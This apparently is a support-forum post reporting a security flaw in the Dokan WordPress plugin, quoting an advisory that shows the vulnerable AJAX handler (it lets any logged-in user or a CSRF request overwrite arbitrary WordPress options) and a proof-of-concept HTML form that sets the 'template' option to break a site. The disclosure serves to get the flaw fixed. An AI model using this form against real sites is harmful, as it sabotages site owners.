Security Issue

Hello,

As per pluginvulnerabilities dot com, Dokan has a security flaw that can break the website.
The following is a direct quote from their article.

”
The plugin registers the function dismiss_upgrade_promo() to be accessible by anyone logged in to WordPress through its AJAX functionality:
add_action( 'wp_ajax_dokan-dismiss-upgrade-promotional-notice', array( $this, 'dismiss_upgrade_promo' ) );

That function, which is located in the file /lib/promotions.php, will update a WordPress option (setting) specified by the POST input “promo_key” to a value modified by the POST input “key”:`
public function dismiss_upgrade_promo() {
if ( isset( $_POST[‘dokan_upgrade_promotion_dismissed’] ) && $_POST[‘dokan_upgrade_promotion_dismissed’] ) {
$promo_option_key = $_POST[‘promo_key’];
$promo_last_display_time = $_POST[‘promo_key’] . ‘_displayed_time’;

$already_displayed_promo = get_option( $promo_option_key, array() );

if ( ! isset( $already_displayed_promo[ $_POST[‘key’] ] ) ) {
$already_displayed_promo[ $_POST[‘key’] ] = array(
‘display’ => 0,
‘last_displayed’ => current_time( ‘mysql’ )
);
}

update_option( $promo_option_key, $already_displayed_promo );`
by replacing the “template” option with content like could be set with this you can disable the frontend and admin area of the website.

Since there is no check for a valid nonce, this could also be exploited through cross-site request forgery (CSRF).

Example:
The following proof of concept will break the website, when logged in to WordPress.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="https://[path to WordPress]/wp-admin/admin-ajax.php?action=dokan-dismiss-upgrade-promotional-notice" method="POST">
<input type="hidden" name="dokan_upgrade_promotion_dismissed" value="true" />
<input type="hidden" name="promo_key" value="template" />
<input type="hidden" name="key" value="test" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

“